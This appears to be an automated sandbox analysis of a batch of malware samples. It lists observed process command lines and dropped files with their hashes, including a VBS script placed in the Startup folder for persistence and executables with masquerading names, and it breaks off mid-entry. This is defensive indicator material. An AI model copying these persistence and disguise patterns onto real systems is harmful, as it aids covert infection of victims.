"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10620440946076400606,5367675788030712452,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3708 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10620440946076400606,5367675788030712452,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4572 /prefetch:1
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 440 -p 4608 -ip 4608
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 4608 -s 3644
C:\Windows\system32\dwm.exe
"dwm.exe"
C:\Windows\system32\werfault.exe
werfault.exe /h /shared Global\69902a92d8b14946b5ce20cbff6aa3aa /t 3204 /p 436
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 628 -p 3740 -ip 3740
C:\Windows\explorer.exe
explorer.exe
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 3740 -s 3440
C:\Windows\system32\dwm.exe
"dwm.exe"
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {9BA05972-F6A8-11CF-A442-00A0C90A8F39} -Embedding
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 404 -p 3204 -ip 3204
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 3204 -s 4092
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 3204 -s 4092
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 600 -p 4412 -ip 4412
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 4412 -s 3676
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4892.0.1728769490\1348298946" -parentBuildID 20221007134813 -prefsHandle 1784 -prefMapHandle 1776 -prefsLen 20938 -prefMapSize 232675 -appDir "C:\Program Files\Mozilla Firefox\browser" - {63b6619b-8869-4c1c-b544-288163fb025b} 4892 "\\.\pipe\gecko-crash-server-pipe.4892" 1944 1c2bfbd7c58 gpu
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4892.1.1884509601\1799933842" -parentBuildID 20221007134813 -prefsHandle 2376 -prefMapHandle 2372 -prefsLen 20974 -prefMapSize 232675 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b20167a8-cc63-47aa-89e5-91e8544779f1} 4892 "\\.\pipe\gecko-crash-server-pipe.4892" 2412 1c2bf6e2258 socket
Network
Files
C:\Users\Admin\Desktop\2023-08-17-18\0bc5ba29090a537426e9f198bc924a23403155a2dcb848a58280f6205f4fd6c1.xls
| MD5 | dcaec797dfb93816d1feac477c300d5c |
| SHA1 | 597e6bc9dcf65338704937865f0755a9869f9cb7 |
| SHA256 | 0bc5ba29090a537426e9f198bc924a23403155a2dcb848a58280f6205f4fd6c1 |
| SHA512 | 59b996e37339e4f4b7726897328cb5e64012409bbafa2a4de42513d43b5fb11d6fe11569e1d67fb29d08a7c47731ca0686a403b7126c02b7a8cefcedf9f613d0 |
C:\Users\Admin\AppData\Roaming\Microsoft\Office\Recent\index.dat
| MD5 | bca3d4d518a06072977c41ea814a2311 |
| SHA1 | 75516f0730abd2b15b7a970f18a5246064b8bee9 |
| SHA256 | 9cc6a254dcee27af8848cbefdd392d44d04437d2c8b9cebb76175a68ea53c09a |
| SHA512 | 00640d5eb4b508f723007968354b54edc44b3bdc1088ae20f84544bab6e0631bdd07fad6e172172100c267fb687991f04ca8e85e6cf1480c2a67a96fa1d20a46 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\424402D6.emf
| MD5 | d69c22a341e111feea69df6d8c655d60 |
| SHA1 | ac862337f2efa43627508927f5052ce694012206 |
| SHA256 | 05b2053bf1d070d6034b45cd79b54d80da3c6d88d016671a345e75048b1a68db |
| SHA512 | d4db33ed046b3c9ba09c4b3feac17b1fe2e75fce67f4154fd795d504708c295a1e3c8331ed3d6c3ee9950c936c4cc25b5d690558c26f2e1f7771bd5eb275822c |
C:\Users\Admin\Desktop\2023-08-17-18\0cdcc03848c1c403215a2e8445c3918f893ee145d4ea5b175d62bf47de0dfb35.exe
| MD5 | f6bf7f27897a06a9d811732cd9b608e1 |
| SHA1 | 296735e8d8ebc474eba089c62f71189fe1d00bd0 |
| SHA256 | 0cdcc03848c1c403215a2e8445c3918f893ee145d4ea5b175d62bf47de0dfb35 |
| SHA512 | 94790415406989c9e9cf31e104f6fff2c0ba37ce110ba3496ae0e12fb6a4cb5accfa202ba5c40a0cb2153449647086a251393fb4ae35701a07be388c5a57e7f6 |
C:\comRuntimeCrtdll\reJQeYd4I.vbe
| MD5 | 1a8884c5e14f4476a570017d2310f0ff |
| SHA1 | f59490edeba91d4b2577510620efa8f74832623d |
| SHA256 | 0f903634014fca7fce912192778138a5978ba372f5b47ca9837d193d1df20569 |
| SHA512 | 6e08ed4b5048a2e55fc2ec9e584a38238c68c714d45b983b13087ea41832f7622692a482c634caa36f175fcf8bca47f4770a0a8bb40c3f763a50730cf109e1b3 |
C:\Users\Admin\Desktop\2023-08-17-18\1f3138026ba3af1ba357d822d95ef957d2661426ab28a7203263d8239b63dafa.exe
| MD5 | a9a44220f7819f03d7b8474033b169ee |
| SHA1 | 0f0bf5382702736838907fd65e5dd7e50616f305 |
| SHA256 | 1f3138026ba3af1ba357d822d95ef957d2661426ab28a7203263d8239b63dafa |
| SHA512 | 255bc358ad925873d382461ad5000f9f55d96c10751a5c682882cee61e363dbbbba2eb405c91ab3ae12df343e84ce9bf04f0e866846317e5ac5288e9d9eb549b |
C:\comRuntimeCrtdll\1yEJ1LJx7Aonc2gKvRqS.bat
| MD5 | f3faff1507515775a00a540d1989063a |
| SHA1 | 936c953cdebf9c746b62569a81d6945ea5b9a737 |
| SHA256 | a7333a41c732765892eabd63e8535e53af7fcb7f46a57d901d7031deb1d398c9 |
| SHA512 | e0f9d15f6fd825df538b201f24580b2988b9ce6665c1c45f31288f6c53bdea2791b9b179e265a387e05b2f52131a7f6e264426f9067cfd47ed03591d03fe6d53 |
C:\comRuntimeCrtdll\agentbrowser.exe
| MD5 | 9a84688aca96d89b149e213f6d059bfb |
| SHA1 | 043c929249d1dcbdddf4cfd278be4425f25bb644 |
| SHA256 | f8ee97725f7f1cdf37b5899e287c8497293e76ab372ee22bd9922ba3624e1b52 |
| SHA512 | c623def7e6276f72993e52c0ad603dbaaabbe85c4856c09c4a03f7180d333f16f5c159722c511e8ae8ccdc9a5d65d1d553b8686f13fdb9f336aaf41b39ef84b5 |
C:\Users\Admin\Desktop\2023-08-17-18\4e8d2ed372068535d420927ad0f59dd34eda4f33f7bafcec6b694379b8948487.jar
| MD5 | f6fc54801fabf0bbb663f40d31aa3955 |
| SHA1 | 7b1fa7f8554baf92409dec2a1f5a54a00ed30054 |
| SHA256 | 4e8d2ed372068535d420927ad0f59dd34eda4f33f7bafcec6b694379b8948487 |
| SHA512 | 610253b6f631e528e39c2675b5b8e002217e5a0553f47af07dffc2eb742d6759e13804a7c16ee62a7b12b0f0865c1a521682fce6a2abfbbc0849f55bcce631e9 |
C:\Users\Admin\Desktop\2023-08-17-18\7a57c3bcbdfc2482505bcf4c20885c1288635f780667a5cf4c7f0804251dd719.js
| MD5 | 71223537f79596646a8938dd2346b649 |
| SHA1 | e0746a857f5aa62fff78070bd3b97db2ddfe559a |
| SHA256 | 7a57c3bcbdfc2482505bcf4c20885c1288635f780667a5cf4c7f0804251dd719 |
| SHA512 | a6850d1eed527874e8b93aa29fa76df11faa7147392db4bb8acf255f4cef028ebfddec329c8f8d0c2e3010f0f0b05b650558108583ae28a0913a849c6dff33ab |
C:\Users\Admin\Desktop\2023-08-17-18\9c60202f8f982a2cd9c02450186b611e472ea1f842e6ba6bdaa7eddcf8f254e5.exe
| MD5 | 5f0afcc8f35d3fbed1a678425a96dcb4 |
| SHA1 | 6ee14626979ce91ff37c4035e23473a0420f36e1 |
| SHA256 | 9c60202f8f982a2cd9c02450186b611e472ea1f842e6ba6bdaa7eddcf8f254e5 |
| SHA512 | 75704f2cde36ee1c48a2addaab7bfa52cbe66e45f54838c04179975f248e0397930508455a3f91abd872917e5c13baa0ea8e014b40b62d1e7b5605b83ed1a0d8 |
C:\Users\Admin\AppData\Local\Temp\TGDEJN.vbs
| MD5 | 57ce47f3c71f44a6e1270ba954ab3a9a |
| SHA1 | c01261f70f0b2ef9e39b9e2a5bf75743760967d4 |
| SHA256 | 2379541bc38b9a61637cee49eb60d902b1af5e27bfa4f7885218308d1024cab4 |
| SHA512 | 85a0b87a248ab50e678b49e622eb1311e2df2fae4a99dea318edde735bcff17e5724dbc71341c70aa62766e1f5f1e8f139ff583f84bf7d3ff5f6bd85002fa264 |
C:\Users\Admin\Desktop\2023-08-17-18\7bf46bf16be075a6c263a2e12339a9a01c96d933eb61b474002144bf7c7cc73b.exe
| MD5 | 254f2b0822d915db93df95571ab74093 |
| SHA1 | 25da96864584dea6e5376857baac56dddd52b254 |
| SHA256 | 7bf46bf16be075a6c263a2e12339a9a01c96d933eb61b474002144bf7c7cc73b |
| SHA512 | ab78be667aca55163ca9fc44ef077047d1ce45c8a86f45cfc4da1303177cee2902cf9c51d0a4d5f8decba7ab8759bb32ddb72579798d1dec0b60086fa622d4f9 |
C:\Users\Admin\Desktop\2023-08-17-18\5dc3015899fea24b6c7b9099fc5e153a69395b4208a249cf9ab2ff9b26d7ae99.exe
| MD5 | 3843399a36f9d39da02586a0603a9f23 |
| SHA1 | d34937bf8c1c34f6f0f18ce9c52ce847f03a2fd4 |
| SHA256 | 5dc3015899fea24b6c7b9099fc5e153a69395b4208a249cf9ab2ff9b26d7ae99 |
| SHA512 | 707a61512a21fc7cdf74252fc3dbfb271abd941d51c35e1442dce569fb1d48b9ba01068d3917749a9730c57c48bfa59b3f3885f3485b522f0da81af5b66b0c87 |
C:\Users\Admin\Desktop\2023-08-17-18\6d0fee7a64435cda0b8ac5652c5a19e9e284514bec8110ae7c02341dcc3e1277.exe
| MD5 | e6b8cfb15c6fce9abcea7a716345d537 |
| SHA1 | c56b60c650439c124b403e31aced45c584ecdd7b |
| SHA256 | 6d0fee7a64435cda0b8ac5652c5a19e9e284514bec8110ae7c02341dcc3e1277 |
| SHA512 | e0163f07a996590e04340b61c3facbc2b5030936028f2ae6bb648b57fadaf2a74d2e8aea29a6eb1b6ff33058feb878f5003609b4bba018c7312c5762f1c84cc1 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TGDEJN.vbs
| MD5 | 57ce47f3c71f44a6e1270ba954ab3a9a |
| SHA1 | c01261f70f0b2ef9e39b9e2a5bf75743760967d4 |
| SHA256 | 2379541bc38b9a61637cee49eb60d902b1af5e27bfa4f7885218308d1024cab4 |
| SHA512 | 85a0b87a248ab50e678b49e622eb1311e2df2fae4a99dea318edde735bcff17e5724dbc71341c70aa62766e1f5f1e8f139ff583f84bf7d3ff5f6bd85002fa264 |
C:\Users\Admin\AppData\Local\Temp\aug.vbs
| MD5 | 2725abf432ceeca35be3ac737c3f0847 |
| SHA1 | 608ac3ed1248b3c35deec3ee55070d52b2c9d1a0 |
| SHA256 | 6eaa55f7bd4117835ac0116d85b20fdcc35e1c461379dbac106d2c2c51d60516 |
| SHA512 | a014a6c2a10f9efe9ca85f4da5505fb2eb6071342b7f4dce0b48446d4462ba26fc1e44a1ba9833d6ab623d2d75c0643c488e46d1995fb20bfd0ed8d8f517b0e2 |
C:\Users\Admin\AppData\Local\Tempwinlogon.exe
| MD5 | 20390c8434f741d1abee9c8d48248bdb |
| SHA1 | 10577df5ed0ecba6a3da8552d112bd5e00e793d2 |
| SHA256 | ab87db3a4dc092240719fe8d9f0192b15dbeaa25ee21ef6607ef5e2cb6f775e3 |
| SHA512 | e1cd502740eb8bc267c7ca61c1781225f598b17948b0c6f99d8495efb27181a34075b7b5a89b775e1b9ac7cccfb5f2cc32fb61dbdf8cda9ac795349745bdd98b |
C:\ProgramData\images.exe
| MD5 | 20390c8434f741d1abee9c8d48248bdb |
| SHA1 | 10577df5ed0ecba6a3da8552d112bd5e00e793d2 |
| SHA256 | ab87db3a4dc092240719fe8d9f0192b15dbeaa25ee21ef6607ef5e2cb6f775e3 |
| SHA512 | e1cd502740eb8bc267c7ca61c1781225f598b17948b0c6f99d8495efb27181a34075b7b5a89b775e1b9ac7cccfb5f2cc32fb61dbdf8cda9ac795349745bdd98b |
C:\Users\Admin\Desktop\2023-08-17-18\45a3e50d6aa0b1ef6a53d9859056f19c0d1e247986032a976d0b2f2b2a4ddd9b.exe
| MD5 | eeaf1ba6942af442482e1ebcad0e1673 |
| SHA1 | 31aa06cdf56d2f7bd3415d6368a65a0fa754ee1d |
| SHA256 | 45a3e50d6aa0b1ef6a53d9859056f19c0d1e247986032a976d0b2f2b2a4ddd9b |
| SHA512 | c8fd363537c3768dab29693b8b813a09edef0feb0708161bfbe707c4dd3a0241f99dadcbcc8f5c803c0c87e7e7a84748b3253d3ffec44bfacf365ea818660474 |
C:\Users\Admin\Desktop\2023-08-17-18\23a0504b8ac3cb1b913d15da848866607a4c617b8bbb5555a71962a6cffadeed.exe
| MD5 | a1c3527c92c39a84c541ef4accd19c8c |
| SHA1 | fbf0a9ceb197c7f3f49209440660cc921b437d0f |
| SHA256 | 23a0504b8ac3cb1b913d15da848866607a4c617b8bbb5555a71962a6cffadeed |
| SHA512 | 8e7d351ab587bb3dd426704031b047f0c8c2469a809b819e437ea297854a2a6b91908386af9c6cd2efb32480f7d2d95cebbf290afa3855a05918db03f13ed0c6 |
C:\Users\Admin\AppData\Local\Temp\nsl9D71.tmp\nosub.dll
| MD5 | c0c6c2911a86799e5511e6c99169f7fa |
| SHA1 | 488bc8e69e060d6d6dc8bc450136eb9c21d0e7ff |
| SHA256 | 54cb41bcb5730f5941a0214106ac09f70479a97e30f4dba1cb50022d1216e3fb |
| SHA512 | 7b0ad6e7ad0ede4138d1ddde4fb6d2fa2abe15e14610c61f14fcd5ef613c765640e2c984dfd9fd074c309f77581c822bc3c2b281c59a0b6d97d3564ab477df9d |
memory/1356-819-0x0000000005A10000-0x0000000005A20000-memory.dmp
memory/3028-821-0x0000000000BD0000-0x0000000000BD2000-memory.dmp
C:\Users\Admin\Desktop\2023-08-17-18\23a0504b8ac3cb1b913d15da848866607a4c617b8bbb5555a71962a6cffadeed.exe
| MD5 | a1c3527c92c39a84c541ef4accd19c8c |
| SHA1 | fbf0a9ceb197c7f3f49209440660cc921b437d0f |
| SHA256 | 23a0504b8ac3cb1b913d15da848866607a4c617b8bbb5555a71962a6cffadeed |
| SHA512 | 8e7d351ab587bb3dd426704031b047f0c8c2469a809b819e437ea297854a2a6b91908386af9c6cd2efb32480f7d2d95cebbf290afa3855a05918db03f13ed0c6 |
memory/2772-838-0x0000000074580000-0x0000000074D30000-memory.dmp
memory/1520-840-0x0000000000400000-0x000000000042F000-memory.dmp
memory/1520-856-0x00000000009B0000-0x0000000000CFA000-memory.dmp
C:\Users\Admin\Desktop\2023-08-17-18\84a8f72750a06cff2cc98a0d4b012821666e089304cfdd3cdde04866876a8fa8.exe
| MD5 | cc1813159fd550c85aae1423853f3307 |
| SHA1 | 020f12dd4aa5a90971c350f447cb55a3640052ea |
| SHA256 | 84a8f72750a06cff2cc98a0d4b012821666e089304cfdd3cdde04866876a8fa8 |
| SHA512 | 95dfde562904136a3c8e2bbe69ea62bea7d5aa4659c186b16faec46af395298c38aa29995e6f0101031f633b89ec381da8179530d9858d391ecc3785e6438187 |
memory/468-871-0x0000000074580000-0x0000000074D30000-memory.dmp
memory/468-869-0x0000000000F30000-0x0000000000FF8000-memory.dmp
C:\Users\Admin\Desktop\2023-08-17-18\82d48c9bb4936387228e0de374d235ac364bd4011519b988623707cb7025150f.exe
| MD5 | 92b8b8d35ba16bf772e1c3c55972ccda |
| SHA1 | 4cb1fcef30fdcfe0f590ba1f223787939257ba36 |
| SHA256 | 82d48c9bb4936387228e0de374d235ac364bd4011519b988623707cb7025150f |
| SHA512 | fed3b35b7f131fc80ca8d21f697ea0e91f3b9ed04eb36087b5d652a3396ce46e649dd6f401839ca0235a1c7bcd7e777c7cf27898ae00fe3dfe1712f0064b6be6 |
C:\Users\Admin\Desktop\2023-08-17-18\76fb6717f8683e5d892659a5e1163f424596b0f61c221ae6c677707ae94387dc.exe
| MD5 | 28f7bcef2f0ad733d84f05d4e1f11e36 |
| SHA1 | d90e4f9ccb44cf67a97f42307425836087381420 |
| SHA256 | 76fb6717f8683e5d892659a5e1163f424596b0f61c221ae6c677707ae94387dc |
| SHA512 | b4cbcb01d58743089089ddd5f5f620bd3766d899a4846109aa65028fe4736875e558e1f484c679691118cb15cf0cb4a582860c6472125128b49c62da892997d3 |
C:\Users\Admin\AppData\Local\Temp\nswAC83.tmp\System.dll
| MD5 | 9625d5b1754bc4ff29281d415d27a0fd |
| SHA1 | 80e85afc5cccd4c0a3775edbb90595a1a59f5ce0 |
| SHA256 | c2f405d7402f815d0c3fadd9a50f0bbbb1bab9aa38fe347823478a2587299448 |
| SHA512 | dce52b640897c2e8dbfd0a1472d5377fa91fb9cf1aeff62604d014bccbe5b56af1378f173132abeb0edd18c225b9f8f5e3d3e72434aed946661e036c779f165b |
C:\Users\Admin\Desktop\2023-08-17-18\a0a349494a2ddb51929195de419866d0b0f1ba3569a6e0722f7be92c253132e5.exe
| MD5 | 94d7d5f70d6d2ffdafb1bc5971357591 |
| SHA1 | 8a653ed7d552faaf82bf5a6c554e7d6ef3c79937 |
| SHA256 | a0a349494a2ddb51929195de419866d0b0f1ba3569a6e0722f7be92c253132e5 |
| SHA512 | f655c869d24a23954755a8f132f57ffc16ad7f1aeeb0836111e8f09d6664f77746e2de4414b72a2d61b04856ad599c45d3a522a10cf8bcd0ae59f0378bf0b842 |
C:\Users\Admin\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\10194C65-FC8E-413C-AF23-8732E6E6A1CA
| MD5 | 0b1f5b87f25cc675c67d233481e9ba9c |
| SHA1 | a4582194b1bdc905019fe18c6bf34acc95261507 |
| SHA256 | 1e7f0a806164ba62fcd57198b9a55bea975f7c79a71443a032e79338434378dc |
| SHA512 | 7503640d5e963e5630d1dae7fa713b5cad463e3ab4577c9d5410397d5fcf04fce677ad97fded19725a2fd607d39a912bb23aae18c414bc200a71e85635d8c597 |
C:\Users\Admin\Desktop\2023-08-17-18\940387888527e0efd604a126935a6174423ce34d15dc1fd7b7c894b78985ad71.rtf
| MD5 | ce556b371242f7d1636bb0d7603b98a0 |
| SHA1 | 641b283d0c914c77ea6b05d75efd562f932a3dc0 |
| SHA256 | 940387888527e0efd604a126935a6174423ce34d15dc1fd7b7c894b78985ad71 |
| SHA512 | 81ec3104db754b36cb0df7ae87182796e1e4d251600b81f992138cf87fc5b2883701519a833af89eb6f4bf1cabc3d8f2564f15aaff14ee85b5e7aa056a3e2dcb |
C:\Users\Admin\Desktop\2023-08-17-18\fbde150ed1511eaf87ff2ef7c8ac5f9cf9dedce7953af526ef8622a4ef73971a.exe
| MD5 | a90c6e3eaed8cc4c94f550c1c7b529b0 |
| SHA1 | 3cd72d872546c17d2274da18ab00b3db75442621 |
| SHA256 | fbde150ed1511eaf87ff2ef7c8ac5f9cf9dedce7953af526ef8622a4ef73971a |
| SHA512 | 0b109e9215e4f8463913e4285b05517c67ec5d311aa7dafd8564a16b29c63cfb03be529c6e36e9b4967af126b74995a31dcb57885384a931aa327d943b360315 |
C:\Users\Admin\AppData\Roaming\Microsoft\Office\Recent\index.dat
| MD5 | 099603e393aa3ab3a05910003fe05d03 |
| SHA1 | 6561f88e70436583d3e08378e926791bfb6169dc |
| SHA256 | 156aa11795154557a3e2482316a6692466af7927f2a9c6c0d28dcda78e0f152c |
| SHA512 | 87ad10d22c371a5cddc3c0b80c150dfa6ac0459908aaed0405d4e9132dc9bb1e85fbb749d73737eebe8c3ea53cf471dcbc0e2b3e58b4933908e7c88db9fb4b1e |
C:\Users\Admin\Desktop\2023-08-17-18\1f3138026ba3af1ba357d822d95ef957d2661426ab28a7203263d8239b63dafa.exe
| MD5 | a9a44220f7819f03d7b8474033b169ee |
| SHA1 | 0f0bf5382702736838907fd65e5dd7e50616f305 |
| SHA256 | 1f3138026ba3af1ba357d822d95ef957d2661426ab28a7203263d8239b63dafa |
| SHA512 | 255bc358ad925873d382461ad5000f9f55d96c10751a5c682882cee61e363dbbbba2eb405c91ab3ae12df343e84ce9bf04f0e866846317e5ac5288e9d9eb549b |
C:\Users\Admin\Desktop\2023-08-17-18\f8ee97725f7f1cdf37b5899e287c8497293e76ab372ee22bd9922ba3624e1b52.exe
| MD5 | 9a84688aca96d89b149e213f6d059bfb |
| SHA1 | 043c929249d1dcbdddf4cfd278be4425f25bb644 |
| SHA256 | f8ee97725f7f1cdf37b5899e287c8497293e76ab372ee22bd9922ba3624e1b52 |
| SHA512 | c623def7e6276f72993e52c0ad603dbaaabbe85c4856c09c4a03f7180d333f16f5c159722c511e8ae8ccdc9a5d65d1d553b8686f13fdb9f336aaf41b39ef84b5 |
C:\Users\Admin\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules.xml
| MD5 | 9727b1893f4a4adc3107a50a77813c8e |
| SHA1 | 93f76aa52461deeeb49672f7dd497cef15470186 |
| SHA256 | a5faca4539374a78a69ef31163e96a358c49014fb3e1fa413f4463b008499d51 |
| SHA512 | acf7309e548ba621e94c32b9062149670012bea2eaf280b97359f2ece6d61e7d60eabeb295c7690b42ed3c52982b317d96aa6205cb58fa44dcd553d8468751d5 |
C:\Users\Admin\Desktop\2023-08-17-18\1f3138026ba3af1ba357d822d95ef957d2661426ab28a7203263d8239b63dafa.exe
| MD5 | a9a44220f7819f03d7b8474033b169ee |
| SHA1 | 0f0bf5382702736838907fd65e5dd7e50616f305 |
| SHA256 | 1f3138026ba3af1ba357d822d95ef957d2661426ab28a7203263d8239b63dafa |
| SHA512 | 255bc358ad925873d382461ad5000f9f55d96c10751a5c682882cee61e363dbbbba2eb405c91ab3ae12df343e84ce9bf04f0e866846317e5ac5288e9d9eb549b |
C:\Users\Admin\Desktop\2023-08-17-18\f8ee97725f7f1cdf37b5899e287c8497293e76ab372ee22bd9922ba3624e1b52.exe
| MD5 | 9a84688aca96d89b149e213f6d059bfb |
| SHA1 | 043c929249d1dcbdddf4cfd278be4425f25bb644 |
| SHA256 | f8ee97725f7f1cdf37b5899e287c8497293e76ab372ee22bd9922ba3624e1b52 |
| SHA512 | c623def7e6276f72993e52c0ad603dbaaabbe85c4856c09c4a03f7180d333f16f5c159722c511e8ae8ccdc9a5d65d1d553b8686f13fdb9f336aaf41b39ef84b5 |
C:\Users\Admin\Desktop\2023-08-17-18\f9de5be5d337c16f6a3ad525011586ae0b14f04169e9b6ae61a35397a3311079.exe
| MD5 | cd88bacf312e7e4b45258af81ce8048b |
| SHA1 | f18cc032c483b6d94b856f7150e25f41509e59b6 |
| SHA256 | f9de5be5d337c16f6a3ad525011586ae0b14f04169e9b6ae61a35397a3311079 |
| SHA512 | cdc7007c2589ccc19cbbe286c8c0d5077d7118a2f7cb34bf735aff29f7e1b890bcf677ba1ef82b112ed2333a0108541a95b1c4461d8ea42fa2672b7bc7adcdd7 |
C:\Users\Admin\Desktop\2023-08-17-18\1f3138026ba3af1ba357d822d95ef957d2661426ab28a7203263d8239b63dafa.exe
| MD5 | a9a44220f7819f03d7b8474033b169ee |
| SHA1 | 0f0bf5382702736838907fd65e5dd7e50616f305 |
| SHA256 | 1f3138026ba3af1ba357d822d95ef957d2661426ab28a7203263d8239b63dafa |
| SHA512 | 255bc358ad925873d382461ad5000f9f55d96c10751a5c682882cee61e363dbbbba2eb405c91ab3ae12df343e84ce9bf04f0e866846317e5ac5288e9d9eb549b |
C:\Users\Admin\AppData\Local\Microsoft\Office\16.0\Floodgate\Excel.CampaignStates.json
| MD5 | 75a71302083de37606971fb174fc2451 |
| SHA1 | f274276bd76eee51a5fa5a1a6b233cfcf768ffcd |
| SHA256 | fb64ee8bc1611a0ee95c475c149e603e5751758e0847bad24cc5fd0fce2198c4 |
| SHA512 | 1554270d82402f0c3073d89765abb89d0d881d517e0861019c2d44a0af8cd72e7b7a3225d8cb6b4b207a77db6a0a1f335e042280fb0ef4fcb46656849ccb4984 |
C:\Users\Admin\AppData\Local\Microsoft\Office\16.0\Floodgate\Excel.SurveyHistoryStats.json
| MD5 | 6ca4960355e4951c72aa5f6364e459d5 |
| SHA1 | 2fd90b4ec32804dff7a41b6e63c8b0a40b592113 |
| SHA256 | 88301f0b7e96132a2699a8bce47d120855c7f0a37054540019e3204d6bcbaba3 |
| SHA512 | 8544cd778717788b7484faf2001f463320a357db63cb72715c1395ef19d32eec4278bab07f15de3f4fed6af7e4f96c41908a0c45be94d5cdd8121877eccf310d |
C:\Users\Admin\AppData\Local\Microsoft\Office\16.0\Floodgate\Excel.GovernedChannelStates.json
| MD5 | c56ff60fbd601e84edd5a0ff1010d584 |
| SHA1 | 342abb130dabeacde1d8ced806d67a3aef00a749 |
| SHA256 | 200e8cc8dd12e22c9720be73092eafb620435d4569dbdcdba9404ace2aa4343c |
| SHA512 | acd2054fddb33b55b58b870edd4eb6a3cdd3131dfe6139cb3d27054ac2b2a460694c9be9c2a1da0f85606e95e7f393cf16868b6c654e78a664799bc3418da86e |
C:\Users\Admin\AppData\Local\Microsoft\Office\16.0\Floodgate\Excel.SurveyEventActivityStats.json
| MD5 | 6ca4960355e4951c72aa5f6364e459d5 |
| SHA1 | 2fd90b4ec32804dff7a41b6e63c8b0a40b592113 |
| SHA256 | 88301f0b7e96132a2699a8bce47d120855c7f0a37054540019e3204d6bcbaba3 |
| SHA512 | 8544cd778717788b7484faf2001f463320a357db63cb72715c1395ef19d32eec4278bab07f15de3f4fed6af7e4f96c41908a0c45be94d5cdd8121877eccf310d |
C:\Users\Admin\Desktop\2023-08-17-18\f97b4c1a380242c5efa234bd8ae966805071ff7dcf10ac44e69cdc9dd1a7eb1b.xlsx
| MD5 | 5146f60c44f767730037618fc96a4587 |
| SHA1 | e6812cb8cf3b1a9a8ac5cf66e36ef3b0938ca1c2 |
| SHA256 | f97b4c1a380242c5efa234bd8ae966805071ff7dcf10ac44e69cdc9dd1a7eb1b |
| SHA512 | feec9090d3c4c411d907a115aa72e1bddccb40acddfe6eaf80c8279d4e329c92bfee42b75746bf67ad467f3c5c23f878c1fbb83dc4afe731ae3ef2562fbd9c65 |
C:\Users\Admin\AppData\Local\Microsoft\Office\16.0\Floodgate\Excel.Settings.json
| MD5 | e4e83f8123e9740b8aa3c3dfa77c1c04 |
| SHA1 | 5281eae96efde7b0e16a1d977f005f0d3bd7aad0 |
| SHA256 | 6034f27b0823b2a6a76fe296e851939fd05324d0af9d55f249c79af118b0eb31 |
| SHA512 | bd6b33fd2bbce4a46991bc0d877695d16f7e60b1959a0defc79b627e569e5c6cac7b4ad4e3e1d8389a08584602a51cf84d44cf247f03beb95f7d307fbba12bb9 |
C:\Users\Admin\Desktop\2023-08-17-18\e9030808d9eb24aba0aa124faebeecaa515b498d738bdb30414af6a15dc98120.vbs
| MD5 | 18a4d7b53fe2eaaf191336f70c40e7b9 |
| SHA1 | 03f92cdcfb008c2799b54fc9ac9971e8773fe771 |
| SHA256 | e9030808d9eb24aba0aa124faebeecaa515b498d738bdb30414af6a15dc98120 |
| SHA512 | 7da74a078d676298502984bafd0752932eacd25ca4b3312aad81254d62eaad991987503f5ea7db5ee82a3b746793213042ba2c158b269026b56bcf5d55b22ded |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms
| MD5 | 10b7e885e2eb15906dc87aa0792e105c |
